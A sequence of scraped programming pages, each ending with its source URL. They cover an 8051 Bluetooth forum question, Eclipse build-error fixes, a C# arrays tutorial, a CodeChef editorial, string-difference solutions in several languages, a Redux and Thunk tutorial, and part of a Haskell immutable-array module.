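                    ReturnCodeDetails: { Text: 'Record Found' },
                    CountryName: { Text: 'UNITED STATES' },
                    CountryCode: { Text: 'US' }
                }
            }
        }
    }
};

// Exactly the expression from Section 8:
console.log(result.Envelope.Body.GetGeoIPResponse.GetGeoIPResult.CountryCode.Text); // US
```

Each element becomes a property named after its tag, and "Text" holds the element's text content — which is why the long chained expression in the summary works.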
https://developers.google.com/apps-script/articles/soap_geoip_example
Doubt regarding usage of a certain function in 8051 based bluetooth home automation

December 8, 2018 - 12:47pm

I have read your project on 8051 based Bluetooth-controlled home automation. After understanding it, I implemented it, but the Bluetooth didn't give any response. Later I read your code and used the function Serialwrite(0x0d), and it worked. Without this statement the Bluetooth does not respond. My question is: what does transmitting 0x0d signify?

Reply: Yes Aditya, you have to write 0x0d every time before you send data. According to the ASCII table, the value 0x0d represents carriage return (the Enter key). So the Bluetooth module should receive a carriage return every time before you send the data.

Reply: I have read about carriage return. It simply puts the cursor in the first position. Could you explain why just putting the cursor in the first position (carriage return) is so important?

Reply: You need to read the Bluetooth datasheet if you want to get more into it. During communication, data is always appended with \n\r, where \n stands for new line; this new line is given by the carriage return, which is mandatory in our case. This is how the Bluetooth module knows that it is the end of the data and that it should transmit whatever was received so far. Hope you get the point.
https://circuitdigest.com/forums/embedded/doubt-regarding-usage-certain-function-8051-based-bluetooth-home-automation
Eclipse error: "The import XXX cannot be resolved" / "cannot be resolved to a type"

This error often appears even when the source code is, in fact, 100% correct — classes compiling after a piece of malformed code can report these errors spuriously, and projects with a significant number of classes (over 1000) seem particularly prone to it. Remedies that worked for various people:

- Clean the project or projects (Project > Clean), make sure Build Automatically is checked, and rebuild. Alternatively, disable Build Automatically, press File > Refresh (F5), then re-enable it. Sometimes the clean/rebuild/refresh cycle has to be repeated.
- Go to any red-marked line, press Ctrl + 1, and choose "Fix project setup".
- Check the build path (right-click the project > Build Path > Configure Build Path). One user found, much to his surprise, that the missing interface was listed as EXCLUDED.
- For those building with an external script (e.g. ant on the command line) rather than Eclipse: Windows > Preferences > Java > Compiler > Building > Output folder > "Rebuild class files modified by others". This tip, discovered by David Resnick, fixed the problem for several commenters.
- If the project is Maven-based, update the project from the POM, or delete the offending artifact from the local ~/.m2 repository so it is re-downloaded. One user on the Atlassian SDK solved the issue by adding the Atlassian Maven repository. Note that class names can change between versions — for instance, on JIRA 5 com.opensimphony.user.User was replaced by com.atlassian.crowd.embedded.api.User, and the same is likely true for other classes.
- If refreshing doesn't help, delete the project from the workspace (keeping the contents on disk) and re-import it.
- For Mercurial users who imported the repository via the plugin: right-click the project > Team > Refresh/Cleanup.
- Some had luck with Project > Source > Format, or with validating the project again.
- As a last resort, inspect the project's configuration directly — the simplest way is to open the .classpath file and check the entries by hand. Also watch out for stray folders: one user created a temp directory at the top of the project folder while cleaning up, which triggered the errors.

Several commenters considered this an Eclipse bug — very annoying, but almost always fixable with one of the steps above.
http://geekster.org/cannot-be/eclipse-import-cannot-be-resolved-error.html
The Array data structure is often better than individually declared variables. This tutorial will cover when to use arrays and how to initialize an array in C#.

Why use an Array?

Often, you will need to work with several related variables of the same data type. An array allows you to declare multiple variables and treat them as part of a single group. This makes data processing and variable manipulation much easier to code and more efficient to execute.

Suppose you have several related Integer variables and you want to know which variable holds a certain value. If you were to use individually declared variables, you might set up a series of if… else if… statements in order to identify which variable contains the value you are interested in. This is a very poor approach from a programming perspective – it is painfully laborious to code, and takes more clock cycles to execute.

With arrays, there is a better way! If you were to declare each of these integers as part of an array structure, you would be able to loop through the array and check for the value you are interested in. You might use a For Loop in this scenario to find out which variable contains the specific value.

How to Declare an Array in C#

To declare an array in C#, you will use the syntax:

```csharp
dataType[] arrayName = new dataType[arrayLength];
```

Create a New .NET Core Console Project in Visual Studio. Add the following line of code inside the static void Main() code block:

```csharp
int[] numbers = new int[5];
```

With this line, we have declared an array of Integer values. Our array has a length of 5; this means the array contains 5 integers, so it can hold 5 integer values. We can assign values to each integer in our array.

```csharp
int[] numbers = new int[5];
numbers[0] = 2;
numbers[1] = 4;
numbers[2] = 8;
numbers[3] = 16;
numbers[4] = 32;
```

We reference individual items in our array structure by the item's index. Index counting starts with the number 0, so our five items will have indices numbered 0-4.
numbers[0] is the first item in the array, numbers[1] is the second item, and so forth.

A Better Way to Initialize Array Values

There is a simpler way to initialize an array in C#.

```csharp
int[] numbers = new int[] { 2, 4, 8, 16, 32 };
```

Using this syntax, we have both declared our array and set initial values for the elements in the array with a single line of code. This yields the same result as Lines 9-15 in our previous example. In both cases, our program will allocate memory in order to store an array of five integers, and it will assign the same values to each of those integers.

Notice, we did not enter a length for this array. By including initial values inside the curly braces, the compiler will figure out the array's size based on the number of elements that are initialized. We can use the same syntax to create an array of other datatypes, like strings:

```csharp
string[] names = new string[] { "Brad", "Brian", "Bob", "Bill" };
```

Accessing Values of Array Elements

If you want to read the value of a specific element in your array, you would reference the item with the correct index number.

```csharp
using System;

namespace Arrays
{
    class Program
    {
        static void Main(string[] args)
        {
            int[] numbers = new int[] { 2, 4, 8, 16, 32 };
            Console.WriteLine(numbers[2]);
            Console.ReadLine();
        }
    }
}
```

For example, if you want to print the value of the third variable in our array of integers, you might use the snippet above and you would expect the value 8 to be printed to the console.

The Bottom Line

Arrays are a very useful data structure in the C# programming language. They allow you to quickly declare and efficiently process related variables of the same data type. In this tutorial, you were introduced to arrays and you learned the benefits of using arrays. We presented the basic syntax for declaring arrays, and showed a simple method for initializing arrays in C#. You also learned how to access the values of elements in your array according to their index number.
Finally, we shared a complete example where an array was declared, initial values were set, and the value of a specific element was written to the console. Ask your questions about initializing C# arrays in the comments below.
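As a footnote, the "Why use an Array?" section mentioned searching an array with a For Loop. A minimal sketch of that idea (the method name here is illustrative, not from the tutorial):

```csharp
// Illustrative sketch: loop through the array to find which element
// holds a specific value. Returns the element's index, or -1 if the
// value is not present.
static int IndexOfValue(int[] values, int target)
{
    for (int i = 0; i < values.Length; i++)
    {
        if (values[i] == target)
        {
            return i;
        }
    }
    return -1;
}
```

Called as IndexOfValue(numbers, 8) with the array from this tutorial, this would return 2 — one loop replaces the whole chain of if… else if… statements that individually declared variables would require.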
https://wellsb.com/csharp/beginners/csharp-initialize-array/
PROBLEM LINK:

Author: Halry Bhalodia

DIFFICULTY:

CAKEWALK

PREREQUISITES:

None

PROBLEM:

Lucky numbers are numbers that consist only of lucky digits, i.e. 4 or 7. For example: 4, 7, 447, 47474 are lucky and 437, 147 are not. Halry likes lucky numbers whereas Harry doesn't. Harry likes nearly lucky numbers. Suppose you have an integer M. If the number of lucky digits in M is a lucky number and the sum of the digits of M is also lucky, then the number is said to be nearly lucky. Halry decides to give some numbers and asks Harry to find how many numbers are lucky, nearly lucky, or neither.

Note: If a number is both lucky and nearly lucky, consider it as only lucky.

EXPLANATION:

This was a simple implementation problem in which you need to do as the question says. To check for a lucky number, you need to check all digits; if any of them is neither 4 nor 7, then the number cannot be lucky. To check for a nearly lucky number, the count of digit 4 plus the count of digit 7 in the number should be lucky, and the sum of all digits should also be lucky.

SOLUTION:

Setter's Solution

```python
def isLucky(n):
    if n.count('4') + n.count('7') == len(n):
        return True
    return False

def isNearlyLucky(n):
    lucky_digits = n.count('4') + n.count('7')
    sum_of_digits = 0
    for ch in n:
        sum_of_digits += int(ch)
    if isLucky(str(lucky_digits)) and isLucky(str(sum_of_digits)):
        return True
    return False

def solve(n, a):
    lucky = 0
    nearly_lucky = 0
    no = 0
    for item in a:
        item = str(item)
        if isLucky(item):
            lucky += 1
        elif isNearlyLucky(item):
            nearly_lucky += 1
        else:
            no += 1
    print(lucky, nearly_lucky, no)

n = int(input())
a = list(map(int, input().split()))
solve(n, a)
```
https://discuss.codechef.com/t/cakp05-editorial/84943
Find The Difference

January 15, 2019

We consider first a solution that sorts both strings then indexes through them until it finds a difference:

```scheme
(define (diff1 xstr ystr)
  (let loop ((xs (sort char<? (string->list xstr)))
             (ys (sort char<? (string->list ystr))))
    (cond ((null? xs) (car ys))
          ((char=? (car xs) (car ys))
            (loop (cdr xs) (cdr ys)))
          (else (car ys)))))

> (diff1 "abcdef" "bfxdeac")
#\x
```

That takes time O(n log n), where n is the length of the strings. A better solution operates in time O(n):

```scheme
(define (diff2 xstr ystr)
  (let ((x (sum (map char->integer (string->list xstr))))
        (y (sum (map char->integer (string->list ystr)))))
    (integer->char (- y x))))

> (diff2 "abcdef" "bfxdeac")
#\x
```

That indexes through the two strings, without sorting, summing the ASCII values of the characters in the strings and reporting the difference at the end. You could use XOR instead of addition if you prefer.

You can run the program at

Scala:

```scala
(t.toSet--(s.toSet)).iterator.next  //> res0: Char = x
```

Nice one for Perl… in the case we are only looking for one known difference, it is just finding the letter in the two strings which appears an odd number of times…. If you were looking for all added/removed letters you could change this to: The %f contains +ve values for letters in $x but not $y, and then -ve values for letters in $y but not in $x, if that makes sense (and the absolute value is the count of each).

Cool one for basic text processing. Here is my take with Julia 1.0.2:

```julia
function StringDifference(s::AbstractString, t::AbstractString)
    S = sort(split(s, ""))
    T = sort(split(t, ""))
end
```

```cpp
#include
#include
#include
using namespace std;
int main() {
    string s1;
    string s2;
    string s3;
```

Fun exercise! I wouldn't have thought of the xor on my own. I also didn't trust myself to always put the shorter string first, so my solutions allow for supplying the strings in either order.
```haskell
module Main where

import Data.Bits (xor)
import Data.Char (chr, ord)
import Data.Foldable (foldl')
import qualified Data.Set as S

data Solution a b = S
  { _in      :: String -> a
  , _compute :: a -> a -> b
  , _out     :: b -> Char
  }

run :: Solution a b -> String -> String -> Char
run (S i c o) x y = o $ c (i x) (i y)

s1 :: Solution (S.Set Char) (S.Set Char)
s1 = S S.fromList (\x y -> (x `S.union` y) S.\\ (x `S.intersection` y)) S.findMin

s2 :: Solution Int Int
s2 = S (sum . fmap ord) (-) (chr . abs)

s3 :: Solution Int Int
s3 = S (foldl' xor 0 . fmap ord) xor chr

main :: IO ()
main = do
  let x = "abcdef"
      y = "bfxdeac"
  print $ all (== 'x') [run s1 x y, run s2 x y, run s3 x y]
```

Sorry, I tried to HTML-escape & post in code tags, but that didn't work right. Retrying with the WordPress sourcecode attribute:

Clearly, it's been too long since I visited! More syntax woes, apologies.

My answer in Python:

```python
s = 'abcdef'
t = 'cbdefxa'
for c in t:
    if c not in s:
        print(c)
```

My C++ is in danger of getting rusty, so let's use it for a solution. See for how the main function compiles. That needs C++14 features, so build with e.g.:

Python solution using sets (similar to the Haskell s1 solution above).

Three Python solutions.

Python solution. Works when s or t have duplicate letters (set solutions don't). Stops when the new letter is found, so it may not process the entire string.

@Mike: doesn't that assume that the characters haven't been shuffled? Good point on use of sets though.

Here's a more streamlined version of my C++ solution:

Another Haskell version.

@Graham, I use the following shell script to create comments here. I run it like then just paste the output in the comment widget.

LOL! I feel your pain. :-)

Here are a few approaches in C. The table-driven approach was my initial implementation. It counts each letter and then compares the counts. The other approaches were inspired by the solution: an XOR approach, a sum approach, and a sorting approach.
Example:

I forgot to free my memory allocations :-(. Here's an update.

The fastest solution I could find in Python.

Prolog solution here (not optimized): Then just
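For readers following along, the XOR idea mentioned in the original solution (and used by the Haskell s3 above) can be sketched in Python — this is an illustrative addition, not one of the submitted comments:

```python
from functools import reduce

def find_difference(s, t):
    """Return the one character in t that is not accounted for in s.

    XOR-ing the code points of both strings cancels every character
    that appears an even number of times across the pair, leaving
    only the single added character. Order of the strings and any
    shuffling of characters does not matter.
    """
    return chr(reduce(lambda acc, ch: acc ^ ord(ch), s + t, 0))

print(find_difference("abcdef", "bfxdeac"))  # prints: x
```

Like the sum approach, this runs in O(n) time and O(1) extra space, and it works even when the strings contain duplicate letters, which trips up the set-based solutions.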
https://programmingpraxis.com/2019/01/15/find-the-difference/2/
A Dummy's Guide to Redux and Thunk in React

If, like me, you've read the Redux docs, watched Dan's videos, done Wes' course and still not quite grasped how to use Redux, hopefully this will help. It took me a few attempts at using Redux before it clicked, so I thought I'd write down the process of converting an existing application that fetches JSON to use Redux and Redux Thunk. If you don't know what Thunk is, don't worry too much, but we'll use it to make asynchronous calls in the "Redux way". This tutorial assumes you have a basic grasp of React and ES6/2015, but it should hopefully be easy enough to follow along regardless.

The non-Redux way

Let's start with creating a React component in components/ItemList.js to fetch and display a list of items.

Laying the foundations

First we'll set up a static component with a state that contains various items to output, and 2 boolean states to render something different when it's loading or errored respectively.

```javascript
import React, { Component } from 'react';

class ItemList extends Component {
    constructor() {
        super();

        this.state = {
            items: [
                { id: 1, label: 'List item 1' },
                { id: 2, label: 'List item 2' },
                { id: 3, label: 'List item 3' },
                { id: 4, label: 'List item 4' }
            ],
            hasErrored: false,
            isLoading: false
        };
    }

    render() {
        if (this.state.hasErrored) {
            return <p>Sorry! There was an error loading the items</p>;
        }

        if (this.state.isLoading) {
            return <p>Loading…</p>;
        }

        return (
            <ul>
                {this.state.items.map((item) => (
                    <li key={item.id}>
                        {item.label}
                    </li>
                ))}
            </ul>
        );
    }
}

export default ItemList;
```

It may not seem like much, but this is a good start. When rendered, the component should output 4 list items, but if you were to set isLoading or hasErrored to true, a relevant <p></p> would be output instead.

Making it dynamic

Hard-coding the items doesn't make for a very useful component, so let's fetch the items from a JSON API, which will also allow us to set isLoading and hasErrored as appropriate.
The response will be identical to our hard-coded list of items, but in the real world, you could pull in a list of best-selling books, latest blog posts, or whatever suits your application.

To fetch the items, we're going to use the aptly named Fetch API. Fetch makes making requests much easier than the classic XMLHttpRequest and returns a promise of the resolved response (which is important to Thunk). Fetch isn't available in all browsers, so you'll need to add it as a dependency to your project with:

```
npm install whatwg-fetch --save
```

The conversion is actually quite simple.

- First we'll set our initial items to an empty array []
- Now we'll add a method to fetch the data and set the loading and error states:

```javascript
fetchData(url) {
    this.setState({ isLoading: true });

    fetch(url)
        .then((response) => {
            if (!response.ok) {
                throw Error(response.statusText);
            }

            this.setState({ isLoading: false });

            return response;
        })
        .then((response) => response.json())
        .then((items) => this.setState({ items })) // ES6 property value shorthand for { items: items }
        .catch(() => this.setState({ hasErrored: true }));
}
```

- Then we'll call it when the component mounts:

```javascript
componentDidMount() {
    this.fetchData('');
}
```

Which leaves us with (unchanged lines omitted):

```javascript
class ItemList extends Component {
    constructor() {
        this.state = {
            items: [],
        };
    }

    fetchData(url) {
        this.setState({ isLoading: true });

        fetch(url)
            .then((response) => {
                if (!response.ok) {
                    throw Error(response.statusText);
                }

                this.setState({ isLoading: false });

                return response;
            })
            .then((response) => response.json())
            .then((items) => this.setState({ items }))
            .catch(() => this.setState({ hasErrored: true }));
    }

    componentDidMount() {
        this.fetchData('');
    }

    render() {
    }
}
```

And that's it. Your component now fetches the items from a REST endpoint! You should hopefully see "Loading…" appear briefly before the 4 list items. If you pass in a broken URL to fetchData you should see our error message.
However, in reality, a component shouldn't include logic to fetch data, and data shouldn't be stored in a component's state, so this is where Redux comes in.

Converting to Redux

To start, we need to add Redux, React Redux and Redux Thunk as dependencies of our project so we can use them. We can do that with:

```
npm install redux react-redux redux-thunk --save
```

Understanding Redux

There are a few core principles to Redux which we need to understand:

- There is 1 global state object that manages the state for your entire application. In this example, it will behave identically to our initial component's state. It is the single source of truth.
- The only way to modify the state is through emitting an action, which is an object that describes what should change. Action Creators are the functions that are dispatched to emit a change – all they do is return an action.
- When an action is dispatched, a Reducer is the function that actually changes the state appropriate to that action – or returns the existing state if the action is not applicable to that reducer.
- Reducers are "pure functions". They should not have any side-effects nor mutate the state — they must return a modified copy.
- Individual reducers are combined into a single rootReducer to create the discrete properties of the state.
- The Store is the thing that brings it all together: it represents the state by using the rootReducer, any middleware (Thunk in our case), and allows you to actually dispatch actions.
- For using Redux in React, the <Provider /> component wraps the entire application and passes the store down to all children.

This should all become clearer as we start to convert our application to use Redux.

Designing our state

From the work we've already done, we know that our state needs to have 3 properties: items, hasErrored and isLoading for this application to work as expected under all circumstances, which correlates to needing 3 unique actions.
Now, here is why Action Creators are different to Actions and do not necessarily have a 1:1 relationship: we need a fourth action creator that calls our 3 other action (creators) depending on the status of fetching the data. This fourth action creator is almost identical to our original fetchData() method, but instead of directly setting the state with this.setState({ isLoading: true }), we'll dispatch an action to do the same: dispatch(isLoading(true)).

Creating our actions

Let's create an actions/items.js file to contain our action creators. We'll start with our 3 simple actions.

```javascript
export function itemsHasErrored(bool) {
    return {
        type: 'ITEMS_HAS_ERRORED',
        hasErrored: bool
    };
}

export function itemsIsLoading(bool) {
    return {
        type: 'ITEMS_IS_LOADING',
        isLoading: bool
    };
}

export function itemsFetchDataSuccess(items) {
    return {
        type: 'ITEMS_FETCH_DATA_SUCCESS',
        items
    };
}
```

As mentioned before, action creators are functions that return an action. We export each one so we can use them elsewhere in our codebase.

The first 2 action creators take a bool (true/false) as their argument and return an object with a meaningful type and the bool assigned to the appropriate property. The third, itemsFetchDataSuccess(), will be called when the data has been successfully fetched, with the data passed to it as items. Through the magic of ES6 property value shorthands, we'll return an object with a property called items whose value will be the array of items.

Note: the value you use for type and the name of the other property that is returned is important, because you will re-use them in your reducers.

Now that we have the 3 actions which will represent our state, we'll convert our original component's fetchData method to an itemsFetchData() action creator. By default, Redux action creators don't support asynchronous actions like fetching data, so here's where we utilise Redux Thunk. Thunk allows you to write action creators that return a function instead of an action.
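As an aside, the thunk middleware itself is tiny. Here is a plain-JavaScript sketch of roughly what redux-thunk does under the hood — a simplification for illustration (the real package also supports an extra injected argument), paired with a hypothetical fake store so it can run without Redux:

```javascript
// Simplified sketch of the thunk middleware: if the dispatched "action"
// is a function, call it with dispatch/getState instead of passing it on.
const thunk = ({ dispatch, getState }) => (next) => (action) =>
    typeof action === 'function'
        ? action(dispatch, getState)
        : next(action);

// Hypothetical fake store, just to demonstrate the behaviour.
function createFakeStore() {
    const dispatched = [];
    const store = {
        getState: () => ({}),
        dispatch: (action) => store.rawDispatch(action),
        dispatched
    };
    // next() is the end of the middleware chain: record the action.
    const next = (action) => dispatched.push(action);
    store.rawDispatch = thunk(store)(next);
    return store;
}

const store = createFakeStore();
store.dispatch({ type: 'PLAIN' });                              // passed straight through
store.dispatch((dispatch) => dispatch({ type: 'FROM_THUNK' })); // function is invoked
console.log(store.dispatched.map((a) => a.type).join(','));     // prints: PLAIN,FROM_THUNK
```

That one conditional is the entire trick: plain action objects flow through untouched, while functions get intercepted and handed dispatch so they can emit actions later.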
The inner function can receive the store methods dispatch and getState as parameters, but we'll just use dispatch. A real simple example would be to manually trigger itemsHasErrored() after 5 seconds.

export function errorAfterFiveSeconds() {
    // We return a function instead of an action object
    return (dispatch) => {
        setTimeout(() => {
            // This function is able to dispatch other action creators
            dispatch(itemsHasErrored(true));
        }, 5000);
    };
}

Now that we know what a thunk is, we can write itemsFetchData().

export function itemsFetchData(url) {
    return (dispatch) => {
        dispatch(itemsIsLoading(true));

        fetch(url)
            .then((response) => {
                if (!response.ok) {
                    throw Error(response.statusText);
                }

                dispatch(itemsIsLoading(false));

                return response;
            })
            .then((response) => response.json())
            .then((items) => dispatch(itemsFetchDataSuccess(items)))
            .catch(() => dispatch(itemsHasErrored(true)));
    };
}

Creating our reducers

With our action creators defined, we now write reducers that take these actions and return a new state of our application.

Note: In Redux, all reducers get called regardless of the action, so inside each one you have to return the original state if the action is not applicable.

Each reducer takes 2 parameters: the previous state (state) and an action object. We can also use an ES6 feature called default parameters to set the default initial state.

Inside each reducer, we use a switch statement to determine when an action.type matches. While it may seem unnecessary in these simple reducers, your reducers could theoretically have a lot of conditions, so if/else if/else will get messy fast. If the action.type matches, then we return the relevant property of action. As mentioned earlier, the type and action[propertyName] is what was defined in your action creators.

OK, knowing this, let’s create our items reducers in reducers/items.js.
export function itemsHasErrored(state = false, action) {
    switch (action.type) {
        case 'ITEMS_HAS_ERRORED':
            return action.hasErrored;

        default:
            return state;
    }
}

export function itemsIsLoading(state = false, action) {
    switch (action.type) {
        case 'ITEMS_IS_LOADING':
            return action.isLoading;

        default:
            return state;
    }
}

export function items(state = [], action) {
    switch (action.type) {
        case 'ITEMS_FETCH_DATA_SUCCESS':
            return action.items;

        default:
            return state;
    }
}

Notice how each reducer is named after the resulting store’s state property, with the action.type not necessarily needing to correspond.

The first 2 reducers hopefully make complete sense, but the last, items(), is slightly different. This is because it could have multiple conditions which would always return an array of items: it could return all in the case of a fetch success, it could return a subset of items after a delete action is dispatched, or it could return an empty array if everything is deleted. To re-iterate, every reducer will return a discrete property of the state, regardless of how many conditions are inside that reducer. That initially took me a while to get my head around.

With the individual reducers created, we need to combine them into a rootReducer to create a single object. Create a new file at reducers/index.js.

import { combineReducers } from 'redux';
import { items, itemsHasErrored, itemsIsLoading } from './items';

export default combineReducers({
    items,
    itemsHasErrored,
    itemsIsLoading
});

We import each of the reducers from items.js and export them with Redux's combineReducers(). As our reducer names are identical to what we want to use for a store's property names, we can use the ES6 shorthand. Notice how I intentionally prefixed my reducer names, so that when the application grows in complexity, I’m not constrained by having a “global” hasErrored or isLoading property.
You may have many different features that could error or be in a loading state, so prefixing the imports and then exporting those will give your application's state greater granularity and flexibility. For example:

import { combineReducers } from 'redux';
import { items, itemsHasErrored, itemsIsLoading } from './items';
import { posts, postsHasErrored, postsIsLoading } from './posts';

export default combineReducers({
    items,
    itemsHasErrored,
    itemsIsLoading,
    posts,
    postsHasErrored,
    postsIsLoading
});

Alternatively, you could alias the methods on import, but I prefer consistency across the board.

Configure the store and provide it to your app

This is pretty straightforward. Let’s create store/configureStore.js with:

import { createStore, applyMiddleware } from 'redux';
import thunk from 'redux-thunk';
import rootReducer from '../reducers';

export default function configureStore(initialState) {
    return createStore(
        rootReducer,
        initialState,
        applyMiddleware(thunk)
    );
}

Now change our app’s index.js to include <Provider />, configureStore, set up our store and wrap our app (<ItemList />) to pass the store down as props:

import React from 'react';
import { render } from 'react-dom';
import { Provider } from 'react-redux';
import configureStore from './store/configureStore';
import ItemList from './components/ItemList';

const store = configureStore(); // You can also pass in an initialState here

render(
    <Provider store={store}>
        <ItemList />
    </Provider>,
    document.getElementById('app')
);

I know, it’s taken quite a bit of effort to get to this stage, but with the setup complete, we can now modify our component to make use of what we’ve done.

Converting our component to use the Redux store and methods

Let’s jump back in to components/ItemList.js.
At the top of the file, import what we need:

import { connect } from 'react-redux';
import { itemsFetchData } from '../actions/items';

connect is what allows us to connect a component to Redux's store, and itemsFetchData is the action creator we wrote earlier. We only need to import this one action creator, as it handles dispatching the other actions.

After our component’s class definition, we're going to map Redux's state and the dispatching of our action creator to props. We create a function that accepts state and then returns an object of props. In a simple component like this, I remove the prefixing for the has/is props as it’s obvious that they're related to items.

const mapStateToProps = (state) => {
    return {
        items: state.items,
        hasErrored: state.itemsHasErrored,
        isLoading: state.itemsIsLoading
    };
};

And then we need another function to be able to dispatch our itemsFetchData() action creator with a prop.

const mapDispatchToProps = (dispatch) => {
    return {
        fetchData: (url) => dispatch(itemsFetchData(url))
    };
};

Again, I’ve removed the items prefix from the returned object property. Here fetchData is a function that accepts a url parameter and returns dispatching itemsFetchData(url).

Now, these 2 functions, mapStateToProps() and mapDispatchToProps(), don't do anything yet, so we need to change our final export line to:

export default connect(mapStateToProps, mapDispatchToProps)(ItemList);

This connects our ItemList to Redux while mapping the props for us to use.

The final step is to convert our component to use props instead of state, and to remove the leftovers.

- Delete the constructor() {} and fetchData() {} methods as they're unnecessary now.
- Change this.fetchData() in componentDidMount() to this.props.fetchData().
- Change this.state.X to this.props.X for .hasErrored, .isLoading and .items.
Your component should now look like this:

import React, { Component } from 'react';
import { connect } from 'react-redux';
import { itemsFetchData } from '../actions/items';

class ItemList extends Component {
    componentDidMount() {
        this.props.fetchData('');
    }

    render() {
        if (this.props.hasErrored) {
            return <p>Sorry! There was an error loading the items</p>;
        }

        if (this.props.isLoading) {
            return <p>Loading…</p>;
        }

        return (
            <ul>
                {this.props.items.map((item) => (
                    <li key={item.id}>
                        {item.label}
                    </li>
                ))}
            </ul>
        );
    }
}

const mapStateToProps = (state) => {
    return {
        items: state.items,
        hasErrored: state.itemsHasErrored,
        isLoading: state.itemsIsLoading
    };
};

const mapDispatchToProps = (dispatch) => {
    return {
        fetchData: (url) => dispatch(itemsFetchData(url))
    };
};

export default connect(mapStateToProps, mapDispatchToProps)(ItemList);

And that’s it! The application now uses Redux and Redux Thunk to fetch and display the data! That wasn’t too difficult, was it? And you’re now a Redux master :D

What next?

I’ve put all of this code up on GitHub, with commits for each step. I want you to clone it, run it and understand it, then add the ability for the user to delete individual list items based on the item’s index.

I haven’t yet really mentioned that in Redux, the state is immutable, which means you can’t modify it, so you have to return a new state in your reducers instead. The 3 reducers we wrote above were simple and “just worked”, but deleting items from an array requires an approach that you may not be familiar with. You can no longer use Array.prototype.splice() to remove items from an array, as that will mutate the original array. Dan explains how to remove an element from an array in this video, but if you get stuck, you can check out (pun intended) the delete-items branch for the solution.

I really hope that this has clarified the concept of Redux and Thunk and how you might go about converting an existing React application to use them.
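For the suggested exercise, the crux is that the items() reducer must return a new array rather than splicing the existing one. Here is one possible sketch; this is my own illustration, not necessarily what the delete-items branch does, and the ITEMS_DELETE_ITEM action type, the itemsDeleteItem() creator and its index property are invented names (exports omitted so the snippet stands alone):

```javascript
// Hypothetical action creator for deleting an item by index.
// The type name and `index` property are invented for this sketch.
function itemsDeleteItem(index) {
    return {
        type: 'ITEMS_DELETE_ITEM',
        index
    };
}

// The items reducer gains one more case. slice() + concat() build a
// brand-new array, so the previous state is never mutated.
function items(state = [], action) {
    switch (action.type) {
        case 'ITEMS_FETCH_DATA_SUCCESS':
            return action.items;

        case 'ITEMS_DELETE_ITEM':
            return state
                .slice(0, action.index)
                .concat(state.slice(action.index + 1));

        default:
            return state;
    }
}
```

Dispatching itemsDeleteItem(1) against ['a', 'b', 'c'] yields ['a', 'c'] while leaving the original array untouched, which is exactly the immutability contract reducers rely on.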
I know that writing this has solidified my understanding of it, so I’m very happy to have done it. I’d still recommend reading the Redux docs, watching Dan’s videos, and re-doing Wes’ course as you should hopefully now be able to understand some of the other more complex and deeper principles. This article has been cross-posted on Codepen for better code formatting.
https://medium.com/@stowball/a-dummys-guide-to-redux-and-thunk-in-react-d8904a7005d3
{-# LANGUAGE CPP, MultiParamTypeClasses #-}

{- |
   Module     : Data.ArrayBZ.Internals.IArray
   Copyright  : (c) The University of Glasgow 2001 & (c) 2006 Bulat Ziganshin
   License    : BSD3
   Maintainer : Bulat Ziganshin <Bulat.Ziganshin@gmail.com>
   Stability  : experimental
   Portability: GHC/Hugs

Immutable arrays: class, general algorithms and Show/Ord/Eq implementations
-}

module Data.ArrayBZ.Internals.IArray where

import Data.Ix

#ifdef __GLASGOW_HASKELL__
import GHC.Arr ( unsafeIndex )
#endif

#ifdef __HUGS__
import Hugs.Array ( unsafeIndex )
#endif

-----------------------------------------------------------------------------
-- Class of immutable arrays

-- | Class of array types with immutable bounds
-- (even if the array elements are mutable).
class HasBounds a where
    -- | Extracts the bounds of an array
    bounds :: Ix i => a i e -> (i,i)

-- | Class of immutable array types.
class HasBounds a => IArray a e where
    unsafeArray      :: Ix i => (i,i) -> [(Int, e)] -> a i e
    unsafeAt         :: Ix i => a i e -> Int -> e
    unsafeReplace    :: Ix i => a i e -> [(Int, e)] -> a i e
    unsafeAccum      :: Ix i => (e -> e' -> e) -> a i e -> [(Int, e')] -> a i e
    unsafeAccumArray :: Ix i => (e -> e' -> e) -> e -> (i,i) -> [(Int, e')] -> a i e

-----------------------------------------------------------------------------
-- Algorithms on immutable arrays

{-# INLINE array #-}
{-| Constructs an immutable array from a pair of bounds and a list of
initial associations. 'Data.Array.Array' is a non-strict array type, but
unboxed arrays such as those of 'Data.Array.Unboxed' are strict in their
elements.
-}
array :: (IArray a e, Ix i)
      => (i,i)      -- ^ bounds of the array: (lowest,highest)
      -> [(i, e)]   -- ^ list of associations
      -> a i e
array (l,u) ies = unsafeArray (l,u) [(index (l,u) i, e) | (i, e) <- ies]

-- Since unsafeFreeze is not guaranteed to be only a cast, we will
-- use unsafeArray and zip instead of a specialized loop to implement
-- listArray, unlike Array.listArray, even though it generates some
-- unnecessary heap allocation. Will use the loop only when we have
-- fast unsafeFreeze, namely for Array and UArray (well, they cover
-- almost all cases).

{-# INLINE listArray #-}
-- | Constructs an immutable array from a list of initial elements.
-- The list gives the elements of the array in ascending order
-- beginning with the lowest index.
listArray :: (IArray a e, Ix i) => (i,i) -> [e] -> a i e
listArray (l,u) es = unsafeArray (l,u) (zip [0 .. rangeSize (l,u) - 1] es)

{-# INLINE (!) #-}
-- | Returns the element of an immutable array at the specified index.
(!) :: (IArray a e, Ix i) => a i e -> i -> e
arr ! i = case bounds arr of
    (l,u) -> unsafeAt arr (index (l,u) i)

{-# INLINE indices #-}
-- | Returns a list of all the valid indices in an array.
indices :: (HasBounds a, Ix i) => a i e -> [i]
indices arr = case bounds arr of (l,u) -> range (l,u)

{-# INLINE elems #-}
-- | Returns a list of all the elements of an array, in the same order
-- as their indices.
elems :: (IArray a e, Ix i) => a i e -> [e]
elems arr = case bounds arr of
    (l,u) -> [unsafeAt arr i | i <- [0 .. rangeSize (l,u) - 1]]

{-# INLINE assocs #-}
-- | Returns the contents of an array as a list of associations.
assocs :: (IArray a e, Ix i) => a i e -> [(i, e)]
assocs arr = case bounds arr of
    (l,u) -> [(i, unsafeAt arr (unsafeIndex (l,u) i)) | i <- range (l,u)]

{-# INLINE accumArray #-}
{-| Constructs an immutable array from a list of associations. Unlike
'array', the same index is allowed to occur multiple times in the list;
the values at equal indices are combined with the accumulating function.
-}
accumArray :: (IArray a e, Ix i)
           => (e -> e' -> e)  -- ^ An accumulating function
           -> e               -- ^ A default element
           -> (i,i)           -- ^ The bounds of the array
           -> [(i, e')]       -- ^ List of associations
           -> a i e           -- ^ Returns: the array
accumArray f initial (l,u) ies =
    unsafeAccumArray f initial (l,u) [(index (l,u) i, e) | (i, e) <- ies]

{-# INLINE (//) #-}
